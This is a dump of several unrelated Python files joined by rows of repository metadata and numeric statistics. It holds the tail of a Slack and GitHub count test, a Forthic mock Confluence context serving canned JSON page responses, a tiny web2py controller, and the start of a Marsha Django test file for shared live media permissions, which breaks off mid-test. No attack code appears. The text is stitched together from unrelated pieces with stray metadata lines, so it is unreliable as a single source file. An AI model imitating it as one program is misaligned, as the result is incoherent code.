    create_projects(projects4, config1)
    print("Number of repos: %s" % len(projects4["Open edX"]["git"]))
    # 154 / 224 are the expected live channel and repo totals — presumably the
    # counts at the time the test was written; verify against current data.
    if len(projects4['Open edX']['slack']) == 154 and len(projects4['Open edX']['github']) == 224:
        print('Test 4 Passed: Not filling data for Git and Slack')
    else:
        print('Test 4 failed')
| 179.601351 | 21,331 | 0.697114 | 3,627 | 26,581 | 5.093741 | 0.157982 | 0.270311 | 0.344032 | 0.417754 | 0.806333 | 0.789824 | 0.77456 | 0.774019 | 0.774019 | 0.768606 | 0 | 0.027015 | 0.079493 | 26,581 | 147 | 21,332 | 180.823129 | 0.728053 | 0.003649 | 0 | 0.166667 | 0 | 0 | 0.783457 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.03125 | false | 0.041667 | 0.041667 | 0 | 0.104167 | 0.083333 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 12 |
24c3036cbaebafec856f5342866ac0ae9493dd73 | 33,867 | py | Python | tests/tests_py/modules/confluence_context.py | absheik/forthic | 1d481f8a4c0c1cc7250eb5886bed43dfb4f201c0 | [
"BSD-2-Clause"
] | 6 | 2021-08-18T19:14:09.000Z | 2022-02-20T05:43:46.000Z | tests/tests_py/modules/confluence_context.py | absheik/forthic | 1d481f8a4c0c1cc7250eb5886bed43dfb4f201c0 | [
"BSD-2-Clause"
] | 1 | 2021-11-25T05:08:28.000Z | 2021-12-01T15:41:21.000Z | tests/tests_py/modules/confluence_context.py | absheik/forthic | 1d481f8a4c0c1cc7250eb5886bed43dfb4f201c0 | [
"BSD-2-Clause"
] | 1 | 2021-11-25T05:03:53.000Z | 2021-11-25T05:03:53.000Z | import json
from forthic.modules.confluence_module import ConfluenceContext
class ServerResponse:
    """Minimal stand-in for a ``requests`` response object.

    Carries a raw JSON payload plus the ``status_code`` and empty ``text``
    attributes that code under test expects to find on a response.
    """

    def __init__(self, string, status_code=200):
        self.json_string = string       # raw JSON payload, decoded on demand
        self.status_code = status_code  # HTTP status to report (200 by default)
        self.text = ""                  # response body text; left empty

    def json(self):
        """Decode the stored payload and return the resulting object."""
        return json.loads(self.json_string)
class ConfluenceTestContext(ConfluenceContext):
    """Fake ConfluenceContext that serves canned JSON for known test routes.

    Any URL outside the fixed route set raises, so an unexpected request made
    by the code under test fails loudly instead of returning garbage.
    """

    def __init__(self):
        # Flips to True once a page-creation POST has been seen; requests_get
        # then switches the "A new page title" ancestors lookup from the empty
        # result to the populated one.
        self.page_created = False

    def get_host(self):
        return "http://testcontext"

    def requests_get(self, api_url):
        # The ancestors lookup is stateful: its answer depends on whether the
        # test page has been "created" yet.
        if api_url == '/wiki/cf/rest/api/content?title=A+new+page+title&spaceKey=SPACE&expand=ancestors':
            if self.page_created:
                return ServerResponse(PAGE_INFO_w_ANCESTORS_RESPONSE)
            return ServerResponse(NO_PAGE_INFO_RESPONSE)
        # All version lookups share the same canned single-page payload.
        version_routes = (
            '/wiki/cf/rest/api/content?title=A+page+title&spaceKey=SPACE&expand=version',
            '/wiki/cf/rest/api/content?title=A+parent+title&spaceKey=SPACE&expand=version',
            '/wiki/cf/rest/api/content?title=A+new+page+title&spaceKey=SPACE&expand=version',
        )
        if api_url in version_routes:
            return ServerResponse(PAGE_INFO_RESPONSE)
        raise Exception(f"Unknown route: {api_url}")

    def requests_post(self, api_url, json=None):
        if api_url != "/wiki/cf/rest/api/content":
            raise Exception(f"Unknown route: {api_url}")
        self.page_created = True  # subsequent ancestors GETs see the new page
        return ServerResponse(CREATE_PAGE_RESPONSE)

    def requests_put(self, api_url, json=None):
        if api_url != '/wiki/cf/rest/api/content/1234':
            raise Exception(f"Unknown route: {api_url}")
        return ServerResponse(UPDATE_PAGE_RESPONSE)
PAGE_INFO_RESPONSE = '''
{
"results": [
{
"id": "1234",
"type": "page",
"status": "current",
"title": "A page title",
"version": {
"by": {
"type": "known",
"username": "testuser",
"userKey": "2c9239b948dc82440148dc876925181a",
"profilePicture": {
"path": "/wiki/cf/images/icons/profilepics/default.svg",
"width": 48,
"height": 48,
"isDefault": true
},
"displayName": "Test User",
"_links": {
"self": "https://testcontext/wiki/cf/rest/api/user?key=2c9239b948dc82440148dc876925181a"
},
"_expandable": {
"status": ""
}
},
"when": "2020-10-23T16:54:50.000Z",
"message": "",
"number": 3,
"minorEdit": false,
"hidden": false,
"_links": {
"self": "https://testcontext/wiki/cf/rest/experimental/content/1234/version/3"
},
"_expandable": {
"content": "/rest/api/content/1234"
}
},
"extensions": {
"position": "none"
},
"_links": {
"webui": "/display/SPACE/A+page+title",
"edit": "/pages/resumedraft.action?draftId=1234&draftShareId=0b59bcea-e6ea-44cc-a0b1-745f7d9e441d",
"tinyui": "/x/chcmFw",
"self": "https://testcontext/wiki/cf/rest/api/content/1234"
},
"_expandable": {
"container": "/rest/api/space/SPACE",
"metadata": "",
"operations": "",
"children": "/rest/api/content/1234/child",
"restrictions": "/rest/api/content/1234/restriction/byOperation",
"history": "/rest/api/content/1234/history",
"ancestors": "",
"body": "",
"descendants": "/rest/api/content/1234/descendant",
"space": "/rest/api/space/SPACE"
}
}
],
"start": 0,
"limit": 25,
"size": 1,
"_links": {
"self": "https://testcontext/wiki/cf/rest/api/content?spaceKey=SPACE&expand=version&title=A%20page%20title",
"base": "https://testcontext/wiki/cf",
"context": "/wiki/cf"
}
}
'''
NO_PAGE_INFO_RESPONSE ='''
{
"results": [],
"start": 0,
"limit": 25,
"size": 0,
"_links": {
"self": "https://testcontext/wiki/cf/rest/api/content?spaceKey=SPACE&expand=ancestors&title=A%20new%20page%20title",
"base": "https://testcontext/wiki/cf",
"context": "/wiki/cf"
}
}
'''
PAGE_INFO_w_ANCESTORS_RESPONSE = '''
{
"results": [
{
"id": "388386405",
"type": "page",
"status": "current",
"title": "A new page title",
"ancestors": [
{
"id": "119239646",
"type": "page",
"status": "current",
"title": "Space Home",
"extensions": {
"position": "none"
},
"_links": {
"webui": "/display/SPACE/Space+Home",
"edit": "/pages/resumedraft.action?draftId=119239646",
"tinyui": "/x/3nMbBw",
"self": "https://testcontext/wiki/cf/rest/api/content/119239646"
},
"_expandable": {
"container": "/rest/api/space/SPACE",
"metadata": "",
"operations": "",
"children": "/rest/api/content/119239646/child",
"restrictions": "/rest/api/content/119239646/restriction/byOperation",
"history": "/rest/api/content/119239646/history",
"ancestors": "",
"body": "",
"version": "",
"descendants": "/rest/api/content/119239646/descendant",
"space": "/rest/api/space/SPACE"
}
},
{
"id": "148348821",
"type": "page",
"status": "current",
"title": "Project SPACE",
"extensions": {
"position": 85
},
"_links": {
"webui": "/display/SPACE/Project+SPACE",
"edit": "/pages/resumedraft.action?draftId=148348821",
"tinyui": "/x/lZ-XC",
"self": "https://testcontext/wiki/cf/rest/api/content/148348821"
},
"_expandable": {
"container": "/rest/api/space/SPACE",
"metadata": "",
"operations": "",
"children": "/rest/api/content/148348821/child",
"restrictions": "/rest/api/content/148348821/restriction/byOperation",
"history": "/rest/api/content/148348821/history",
"ancestors": "",
"body": "",
"version": "",
"descendants": "/rest/api/content/148348821/descendant",
"space": "/rest/api/space/SPACE"
}
},
{
"id": "148348824",
"type": "page",
"status": "current",
"title": "Forthic",
"extensions": {
"position": "none"
},
"_links": {
"webui": "/display/SPACE/Forthic",
"edit": "/pages/resumedraft.action?draftId=148348824",
"tinyui": "/x/mJ-XC",
"self": "https://testcontext/wiki/cf/rest/api/content/148348824"
},
"_expandable": {
"container": "/rest/api/space/SPACE",
"metadata": "",
"operations": "",
"children": "/rest/api/content/148348824/child",
"restrictions": "/rest/api/content/148348824/restriction/byOperation",
"history": "/rest/api/content/148348824/history",
"ancestors": "",
"body": "",
"version": "",
"descendants": "/rest/api/content/148348824/descendant",
"space": "/rest/api/space/SPACE"
}
},
{
"id": "248042769",
"type": "page",
"status": "current",
"title": "Forthic Framework",
"extensions": {
"position": "none"
},
"_links": {
"webui": "/display/SPACE/Forthic+Framework",
"edit": "/pages/resumedraft.action?draftId=248042769&draftShareId=e6dfb6e9-9a98-4e20-8afc-8fdfaa354ace",
"tinyui": "/x/EdXIDg",
"self": "https://testcontext/wiki/cf/rest/api/content/248042769"
},
"_expandable": {
"container": "/rest/api/space/SPACE",
"metadata": "",
"operations": "",
"children": "/rest/api/content/248042769/child",
"restrictions": "/rest/api/content/248042769/restriction/byOperation",
"history": "/rest/api/content/248042769/history",
"ancestors": "",
"body": "",
"version": "",
"descendants": "/rest/api/content/248042769/descendant",
"space": "/rest/api/space/SPACE"
}
},
{
"id": "261397943",
"type": "page",
"status": "current",
"title": "A parent title",
"extensions": {
"position": "none"
},
"_links": {
"webui": "/display/SPACE/Forthic+Testing",
"edit": "/pages/resumedraft.action?draftId=261397943&draftShareId=5ebe725d-0d69-46a5-bf3f-5cd01d7c17c7",
"tinyui": "/x/t52UDw",
"self": "https://testcontext/wiki/cf/rest/api/content/261397943"
},
"_expandable": {
"container": "/rest/api/space/SPACE",
"metadata": "",
"operations": "",
"children": "/rest/api/content/261397943/child",
"restrictions": "/rest/api/content/261397943/restriction/byOperation",
"history": "/rest/api/content/261397943/history",
"ancestors": "",
"body": "",
"version": "",
"descendants": "/rest/api/content/261397943/descendant",
"space": "/rest/api/space/SPACE"
}
}
],
"extensions": {
"position": "none"
},
"_links": {
"webui": "/display/SPACE/A+new+page+title",
"edit": "/pages/resumedraft.action?draftId=388386405",
"tinyui": "/x/ZU4mFw",
"self": "https://testcontext/wiki/cf/rest/api/content/388386405"
},
"_expandable": {
"container": "/rest/api/space/SPACE",
"metadata": "",
"operations": "",
"children": "/rest/api/content/388386405/child",
"restrictions": "/rest/api/content/388386405/restriction/byOperation",
"history": "/rest/api/content/388386405/history",
"body": "",
"version": "",
"descendants": "/rest/api/content/388386405/descendant",
"space": "/rest/api/space/SPACE"
}
}
],
"start": 0,
"limit": 25,
"size": 1,
"_links": {
"self": "https://testcontext/wiki/cf/rest/api/content?spaceKey=SPACE&expand=ancestors&title=A%20new%20page%20title",
"base": "https://testcontext/wiki/cf",
"context": "/wiki/cf"
}
}
'''
CREATE_PAGE_RESPONSE='''
{
"id": "388386403",
"type": "page",
"status": "current",
"title": "A new page title",
"space": {
"id": 119963668,
"key": "SPACE",
"name": "Space",
"type": "global",
"_links": {
"webui": "/display/SPACE",
"self": "https://testcontext/wiki/cf/rest/api/space/SPACE"
},
"_expandable": {
"metadata": "",
"icon": "",
"description": "",
"homepage": "/rest/api/content/119239646"
}
},
"history": {
"latest": true,
"createdBy": {
"type": "known",
"username": "SPACE-auto",
"userKey": "2c9239b948dc82440148dc875dc709a1",
"profilePicture": {
"path": "/wiki/cf/images/icons/profilepics/default.svg",
"width": 48,
"height": 48,
"isDefault": true
},
"displayName": "SPACE-auto",
"_links": {
"self": "https://testcontext/wiki/cf/rest/api/user?key=2c9239b948dc82440148dc875dc709a1"
},
"_expandable": {
"status": ""
}
},
"createdDate": "2020-10-30T15:48:59.311Z",
"_links": {
"self": "https://testcontext/wiki/cf/rest/api/content/388386403/history"
},
"_expandable": {
"lastUpdated": "",
"previousVersion": "",
"contributors": "",
"nextVersion": ""
}
},
"version": {
"by": {
"type": "known",
"username": "SPACE-auto",
"userKey": "2c9239b948dc82440148dc875dc709a1",
"profilePicture": {
"path": "/wiki/cf/images/icons/profilepics/default.svg",
"width": 48,
"height": 48,
"isDefault": true
},
"displayName": "SPACE-auto",
"_links": {
"self": "https://testcontext/wiki/cf/rest/api/user?key=2c9239b948dc82440148dc875dc709a1"
},
"_expandable": {
"status": ""
}
},
"when": "2020-10-30T15:48:59.311Z",
"message": "",
"number": 1,
"minorEdit": false,
"hidden": false,
"_links": {
"self": "https://testcontext/wiki/cf/rest/experimental/content/388386403/version/1"
},
"_expandable": {
"content": "/rest/api/content/388386403"
}
},
"ancestors": [
{
"id": "119239646",
"type": "page",
"status": "current",
"title": "Space Home",
"extensions": {
"position": "none"
},
"_links": {
"webui": "/display/SPACE/Space+Home",
"edit": "/pages/resumedraft.action?draftId=119239646",
"tinyui": "/x/3nMbBw",
"self": "https://testcontext/wiki/cf/rest/api/content/119239646"
},
"_expandable": {
"container": "/rest/api/space/SPACE",
"metadata": "",
"operations": "",
"children": "/rest/api/content/119239646/child",
"restrictions": "/rest/api/content/119239646/restriction/byOperation",
"history": "/rest/api/content/119239646/history",
"ancestors": "",
"body": "",
"version": "",
"descendants": "/rest/api/content/119239646/descendant",
"space": "/rest/api/space/SPACE"
}
},
{
"id": "148348821",
"type": "page",
"status": "current",
"title": "Project SPACE",
"extensions": {
"position": 85
},
"_links": {
"webui": "/display/SPACE/Project+SPACE",
"edit": "/pages/resumedraft.action?draftId=148348821",
"tinyui": "/x/lZ-XC",
"self": "https://testcontext/wiki/cf/rest/api/content/148348821"
},
"_expandable": {
"container": "/rest/api/space/SPACE",
"metadata": "",
"operations": "",
"children": "/rest/api/content/148348821/child",
"restrictions": "/rest/api/content/148348821/restriction/byOperation",
"history": "/rest/api/content/148348821/history",
"ancestors": "",
"body": "",
"version": "",
"descendants": "/rest/api/content/148348821/descendant",
"space": "/rest/api/space/SPACE"
}
},
{
"id": "148348824",
"type": "page",
"status": "current",
"title": "Forthic",
"extensions": {
"position": "none"
},
"_links": {
"webui": "/display/SPACE/Forthic",
"edit": "/pages/resumedraft.action?draftId=148348824",
"tinyui": "/x/mJ-XC",
"self": "https://testcontext/wiki/cf/rest/api/content/148348824"
},
"_expandable": {
"container": "/rest/api/space/SPACE",
"metadata": "",
"operations": "",
"children": "/rest/api/content/148348824/child",
"restrictions": "/rest/api/content/148348824/restriction/byOperation",
"history": "/rest/api/content/148348824/history",
"ancestors": "",
"body": "",
"version": "",
"descendants": "/rest/api/content/148348824/descendant",
"space": "/rest/api/space/SPACE"
}
},
{
"id": "248042769",
"type": "page",
"status": "current",
"title": "Forthic Framework",
"extensions": {
"position": "none"
},
"_links": {
"webui": "/display/SPACE/Forthic+Framework",
"edit": "/pages/resumedraft.action?draftId=248042769&draftShareId=e6dfb6e9-9a98-4e20-8afc-8fdfaa354ace",
"tinyui": "/x/EdXIDg",
"self": "https://testcontext/wiki/cf/rest/api/content/248042769"
},
"_expandable": {
"container": "/rest/api/space/SPACE",
"metadata": "",
"operations": "",
"children": "/rest/api/content/248042769/child",
"restrictions": "/rest/api/content/248042769/restriction/byOperation",
"history": "/rest/api/content/248042769/history",
"ancestors": "",
"body": "",
"version": "",
"descendants": "/rest/api/content/248042769/descendant",
"space": "/rest/api/space/SPACE"
}
},
{
"id": "261397943",
"type": "page",
"status": "current",
"title": "A parent title",
"extensions": {
"position": "none"
},
"_links": {
"webui": "/display/SPACE/Forthic+Testing",
"edit": "/pages/resumedraft.action?draftId=261397943&draftShareId=5ebe725d-0d69-46a5-bf3f-5cd01d7c17c7",
"tinyui": "/x/t52UDw",
"self": "https://testcontext/wiki/cf/rest/api/content/261397943"
},
"_expandable": {
"container": "/rest/api/space/SPACE",
"metadata": "",
"operations": "",
"children": "/rest/api/content/261397943/child",
"restrictions": "/rest/api/content/261397943/restriction/byOperation",
"history": "/rest/api/content/261397943/history",
"ancestors": "",
"body": "",
"version": "",
"descendants": "/rest/api/content/261397943/descendant",
"space": "/rest/api/space/SPACE"
}
}
],
"container": {
"id": 119963668,
"key": "SPACE",
"name": "Space",
"type": "global",
"_links": {
"webui": "/display/SPACE",
"self": "https://testcontext/wiki/cf/rest/api/space/SPACE"
},
"_expandable": {
"metadata": "",
"icon": "",
"description": "",
"homepage": "/rest/api/content/119239646"
}
},
"body": {
"storage": {
"value": "<h2>This is a test</h2>",
"representation": "storage",
"_expandable": {
"content": "/rest/api/content/388386403"
}
},
"_expandable": {
"editor": "",
"view": "",
"export_view": "",
"styled_view": "",
"anonymous_export_view": ""
}
},
"extensions": {
"position": "none"
},
"_links": {
"webui": "/display/SPACE/A+new+page+title",
"edit": "/pages/resumedraft.action?draftId=388386403",
"tinyui": "/x/Y04mFw",
"collection": "/rest/api/content",
"base": "https://testcontext/wiki/cf",
"context": "/wiki/cf",
"self": "https://testcontext/wiki/cf/rest/api/content/388386403"
},
"_expandable": {
"metadata": "",
"operations": "",
"children": "/rest/api/content/388386403/child",
"restrictions": "/rest/api/content/388386403/restriction/byOperation",
"descendants": "/rest/api/content/388386403/descendant"
}
}
'''
UPDATE_PAGE_RESPONSE = '''
{
"id": "1234",
"type": "page",
"status": "current",
"title": "A new page title",
"space": {
"id": 119963668,
"key": "SPACE",
"name": "SPACE",
"type": "global",
"_links": {
"webui": "/display/SPACE",
"self": "https://testcontext/wiki/cf/rest/api/space/SPACE"
},
"_expandable": {
"metadata": "",
"icon": "",
"description": "",
"homepage": "/rest/api/content/119239646"
}
},
"history": {
"latest": true,
"createdBy": {
"type": "known",
"username": "SPACE-auto",
"userKey": "2c9239b948dc82440148dc875dc709a1",
"profilePicture": {
"path": "/wiki/cf/images/icons/profilepics/default.svg",
"width": 48,
"height": 48,
"isDefault": true
},
"displayName": "SPACE-auto",
"_links": {
"self": "https://testcontext/wiki/cf/rest/api/user?key=2c9239b948dc82440148dc875dc709a1"
},
"_expandable": {
"status": ""
}
},
"createdDate": "2020-10-30T15:58:05.590Z",
"_links": {
"self": "https://testcontext/wiki/cf/rest/api/content/388386405/history"
},
"_expandable": {
"lastUpdated": "",
"previousVersion": "",
"contributors": "",
"nextVersion": ""
}
},
"version": {
"by": {
"type": "known",
"username": "SPACE-auto",
"userKey": "2c9239b948dc82440148dc875dc709a1",
"profilePicture": {
"path": "/wiki/cf/images/icons/profilepics/default.svg",
"width": 48,
"height": 48,
"isDefault": true
},
"displayName": "SPACE-auto",
"_links": {
"self": "https://testcontext/wiki/cf/rest/api/user?key=2c9239b948dc82440148dc875dc709a1"
},
"_expandable": {
"status": ""
}
},
"when": "2020-10-30T16:29:18.318Z",
"number": 2,
"minorEdit": false,
"hidden": false,
"_links": {
"self": "https://testcontext/wiki/cf/rest/experimental/content/388386405/version/2"
},
"_expandable": {
"content": "/rest/api/content/388386405"
}
},
"ancestors": [
{
"id": "119239646",
"type": "page",
"status": "current",
"title": "SPACE Home",
"extensions": {
"position": "none"
},
"_links": {
"webui": "/display/SPACE/SPACE+Home",
"edit": "/pages/resumedraft.action?draftId=119239646",
"tinyui": "/x/3nMbBw",
"self": "https://testcontext/wiki/cf/rest/api/content/119239646"
},
"_expandable": {
"container": "/rest/api/space/SPACE",
"metadata": "",
"operations": "",
"children": "/rest/api/content/119239646/child",
"restrictions": "/rest/api/content/119239646/restriction/byOperation",
"history": "/rest/api/content/119239646/history",
"ancestors": "",
"body": "",
"version": "",
"descendants": "/rest/api/content/119239646/descendant",
"space": "/rest/api/space/SPACE"
}
},
{
"id": "148348821",
"type": "page",
"status": "current",
"title": "Project SPACE",
"extensions": {
"position": 85
},
"_links": {
"webui": "/display/SPACE/Project+SPACE",
"edit": "/pages/resumedraft.action?draftId=148348821",
"tinyui": "/x/lZ-XC",
"self": "https://testcontext/wiki/cf/rest/api/content/148348821"
},
"_expandable": {
"container": "/rest/api/space/SPACE",
"metadata": "",
"operations": "",
"children": "/rest/api/content/148348821/child",
"restrictions": "/rest/api/content/148348821/restriction/byOperation",
"history": "/rest/api/content/148348821/history",
"ancestors": "",
"body": "",
"version": "",
"descendants": "/rest/api/content/148348821/descendant",
"space": "/rest/api/space/SPACE"
}
},
{
"id": "148348824",
"type": "page",
"status": "current",
"title": "Forthic",
"extensions": {
"position": "none"
},
"_links": {
"webui": "/display/SPACE/Forthic",
"edit": "/pages/resumedraft.action?draftId=148348824",
"tinyui": "/x/mJ-XC",
"self": "https://testcontext/wiki/cf/rest/api/content/148348824"
},
"_expandable": {
"container": "/rest/api/space/SPACE",
"metadata": "",
"operations": "",
"children": "/rest/api/content/148348824/child",
"restrictions": "/rest/api/content/148348824/restriction/byOperation",
"history": "/rest/api/content/148348824/history",
"ancestors": "",
"body": "",
"version": "",
"descendants": "/rest/api/content/148348824/descendant",
"space": "/rest/api/space/SPACE"
}
},
{
"id": "248042769",
"type": "page",
"status": "current",
"title": "Forthic Framework",
"extensions": {
"position": "none"
},
"_links": {
"webui": "/display/SPACE/Forthic+Framework",
"edit": "/pages/resumedraft.action?draftId=248042769&draftShareId=e6dfb6e9-9a98-4e20-8afc-8fdfaa354ace",
"tinyui": "/x/EdXIDg",
"self": "https://testcontext/wiki/cf/rest/api/content/248042769"
},
"_expandable": {
"container": "/rest/api/space/SPACE",
"metadata": "",
"operations": "",
"children": "/rest/api/content/248042769/child",
"restrictions": "/rest/api/content/248042769/restriction/byOperation",
"history": "/rest/api/content/248042769/history",
"ancestors": "",
"body": "",
"version": "",
"descendants": "/rest/api/content/248042769/descendant",
"space": "/rest/api/space/SPACE"
}
},
{
"id": "261397943",
"type": "page",
"status": "current",
"title": "Forthic Testing",
"extensions": {
"position": "none"
},
"_links": {
"webui": "/display/SPACE/Forthic+Testing",
"edit": "/pages/resumedraft.action?draftId=261397943&draftShareId=5ebe725d-0d69-46a5-bf3f-5cd01d7c17c7",
"tinyui": "/x/t52UDw",
"self": "https://testcontext/wiki/cf/rest/api/content/261397943"
},
"_expandable": {
"container": "/rest/api/space/SPACE",
"metadata": "",
"operations": "",
"children": "/rest/api/content/261397943/child",
"restrictions": "/rest/api/content/261397943/restriction/byOperation",
"history": "/rest/api/content/261397943/history",
"ancestors": "",
"body": "",
"version": "",
"descendants": "/rest/api/content/261397943/descendant",
"space": "/rest/api/space/SPACE"
}
}
],
"container": {
"id": 119963668,
"key": "SPACE",
"name": "SPACE",
"type": "global",
"_links": {
"webui": "/display/SPACE",
"self": "https://testcontext/wiki/cf/rest/api/space/SPACE"
},
"_expandable": {
"metadata": "",
"icon": "",
"description": "",
"homepage": "/rest/api/content/119239646"
}
},
"body": {
"storage": {
"value": "<h2>This is second a test</h2>",
"representation": "storage",
"_expandable": {
"content": "/rest/api/content/388386405"
}
},
"_expandable": {
"editor": "",
"view": "",
"export_view": "",
"styled_view": "",
"anonymous_export_view": ""
}
},
"extensions": {
"position": "none"
},
"_links": {
"webui": "/display/SPACE/A+new+page+title",
"edit": "/pages/resumedraft.action?draftId=388386405",
"tinyui": "/x/ZU4mFw",
"collection": "/rest/api/content",
"base": "https://testcontext/wiki/cf",
"context": "/wiki/cf",
"self": "https://testcontext/wiki/cf/rest/api/content/388386405"
},
"_expandable": {
"metadata": "",
"operations": "",
"children": "/rest/api/content/388386405/child",
"restrictions": "/rest/api/content/388386405/restriction/byOperation",
"descendants": "/rest/api/content/388386405/descendant"
}
}
''' | 38.224605 | 134 | 0.430094 | 2,416 | 33,867 | 5.968543 | 0.090232 | 0.077184 | 0.112621 | 0.062552 | 0.930791 | 0.915395 | 0.892233 | 0.885853 | 0.877254 | 0.866019 | 0 | 0.090818 | 0.412821 | 33,867 | 886 | 135 | 38.224605 | 0.634316 | 0 | 0 | 0.725287 | 0 | 0.028736 | 0.94573 | 0.212716 | 0 | 0 | 0 | 0 | 0 | 1 | 0.008046 | false | 0 | 0.002299 | 0.001149 | 0.018391 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
24c6e5311426cf5f06971a03b1d9c08a06ae45d3 | 32 | py | Python | applications/init/controllers/files.py | xiejiafang/phone_report | ab86c66fcc1189fb2c78b7afad5d3a4a9c715e80 | [
"BSD-3-Clause"
] | 2 | 2018-04-27T08:44:38.000Z | 2021-11-24T05:58:42.000Z | applications/init/controllers/files.py | xiejiafang/phone_report | ab86c66fcc1189fb2c78b7afad5d3a4a9c715e80 | [
"BSD-3-Clause"
] | null | null | null | applications/init/controllers/files.py | xiejiafang/phone_report | ab86c66fcc1189fb2c78b7afad5d3a4a9c715e80 | [
"BSD-3-Clause"
] | 2 | 2018-06-28T03:14:39.000Z | 2019-05-06T16:26:24.000Z | def liuzhengxin(): return dict() | 32 | 32 | 0.75 | 4 | 32 | 6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.09375 | 32 | 1 | 32 | 32 | 0.827586 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | true | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
24cd45b5cd41909413b58100cb86ed5a537d3b05 | 51,370 | py | Python | src/backend/marsha/core/tests/test_api_video_shared_live_media.py | insad-video/marsha | 1e6a708c74527f50c4aa24d811049492e75f47a0 | [
"MIT"
] | null | null | null | src/backend/marsha/core/tests/test_api_video_shared_live_media.py | insad-video/marsha | 1e6a708c74527f50c4aa24d811049492e75f47a0 | [
"MIT"
] | null | null | null | src/backend/marsha/core/tests/test_api_video_shared_live_media.py | insad-video/marsha | 1e6a708c74527f50c4aa24d811049492e75f47a0 | [
"MIT"
] | null | null | null | """Tests for the Video API for SharedLiveMedia navigation of the Marsha project."""
from datetime import datetime, timezone
import json
import random
from unittest import mock
from django.test import TestCase, override_settings
from rest_framework_simplejwt.tokens import AccessToken
from ..api.video import channel_layers_utils
from ..defaults import DELETED, ERROR, JITSI, PENDING, PROCESSING, READY, RUNNING
from ..factories import SharedLiveMediaFactory, UserFactory, VideoFactory
# pylint: disable=too-many-public-methods,too-many-lines
class TestVideoSharedLiveMedia(TestCase):
"""Tests for the Video API for SharedLiveMedia navigation of the Marsha project."""
maxDiff = None
def test_api_video_shared_live_media_start_anonymous(self):
"""An anonymous user can not start a shared live media."""
shared_live_media = SharedLiveMediaFactory()
response = self.client.patch(
f"/api/videos/{shared_live_media.video.id}/start-sharing/"
)
self.assertEqual(response.status_code, 401)
self.assertEqual(
response.json(), {"detail": "Authentication credentials were not provided."}
)
def test_api_video_shared_live_media_navigate_anonymous(self):
"""An anonymous user can not navigate in a shared live media."""
shared_live_media = SharedLiveMediaFactory()
response = self.client.patch(
f"/api/videos/{shared_live_media.video.id}/navigate-sharing/"
)
self.assertEqual(response.status_code, 401)
self.assertEqual(
response.json(), {"detail": "Authentication credentials were not provided."}
)
def test_api_video_shared_live_media_end_anonymous(self):
"""An anonymous user can not end a shared live media."""
shared_live_media = SharedLiveMediaFactory()
response = self.client.patch(
f"/api/videos/{shared_live_media.video.id}/end-sharing/"
)
self.assertEqual(response.status_code, 401)
self.assertEqual(
response.json(), {"detail": "Authentication credentials were not provided."}
)
def test_api_video_shared_live_media_start_student(self):
"""A student user can not start a shared live media."""
shared_live_media = SharedLiveMediaFactory()
jwt_token = AccessToken()
jwt_token.payload["resource_id"] = str(shared_live_media.video.id)
jwt_token.payload["context_id"] = str(shared_live_media.video.playlist.lti_id)
jwt_token.payload["consumer_site"] = str(
shared_live_media.video.playlist.consumer_site.id
)
jwt_token.payload["roles"] = ["student"]
jwt_token.payload["permissions"] = {"can_update": False}
response = self.client.patch(
f"/api/videos/{shared_live_media.video.id}/start-sharing/",
HTTP_AUTHORIZATION=f"Bearer {jwt_token}",
)
self.assertEqual(response.status_code, 403)
self.assertEqual(
response.json(),
{"detail": "You do not have permission to perform this action."},
)
def test_api_video_shared_live_media_navigate_student(self):
"""A student user can not navigate in a shared live media."""
shared_live_media = SharedLiveMediaFactory()
jwt_token = AccessToken()
jwt_token.payload["resource_id"] = str(shared_live_media.video.id)
jwt_token.payload["roles"] = ["student"]
response = self.client.patch(
f"/api/videos/{shared_live_media.video.id}/navigate-sharing/",
HTTP_AUTHORIZATION=f"Bearer {jwt_token}",
)
self.assertEqual(response.status_code, 403)
self.assertEqual(
response.json(),
{"detail": "You do not have permission to perform this action."},
)
def test_api_video_shared_live_media_end_student(self):
"""A student user can not end a shared live media."""
shared_live_media = SharedLiveMediaFactory()
jwt_token = AccessToken()
jwt_token.payload["resource_id"] = str(shared_live_media.video.id)
jwt_token.payload["roles"] = ["student"]
response = self.client.patch(
f"/api/videos/{shared_live_media.video.id}/end-sharing/",
HTTP_AUTHORIZATION=f"Bearer {jwt_token}",
)
self.assertEqual(response.status_code, 403)
self.assertEqual(
response.json(),
{"detail": "You do not have permission to perform this action."},
)
def test_api_video_shared_live_media_start_staff_or_user(self):
"""Users authenticated via a session can not start a shared live media."""
shared_live_media = SharedLiveMediaFactory()
for user in [UserFactory(), UserFactory(is_staff=True)]:
self.client.login(username=user.username, password="test")
response = self.client.patch(
f"/api/videos/{shared_live_media.video.id}/start-sharing/"
)
self.assertEqual(response.status_code, 401)
self.assertEqual(
response.json(),
{"detail": "Authentication credentials were not provided."},
)
def test_api_video_shared_live_media_navigate_staff_or_user(self):
"""Users authenticated via a session can not navigate in a shared live media."""
shared_live_media = SharedLiveMediaFactory()
for user in [UserFactory(), UserFactory(is_staff=True)]:
self.client.login(username=user.username, password="test")
response = self.client.patch(
f"/api/videos/{shared_live_media.video.id}/navigate-sharing/"
)
self.assertEqual(response.status_code, 401)
self.assertEqual(
response.json(),
{"detail": "Authentication credentials were not provided."},
)
def test_api_video_shared_live_media_end_staff_or_user(self):
"""Users authenticated via a session can not end a shared live media."""
shared_live_media = SharedLiveMediaFactory()
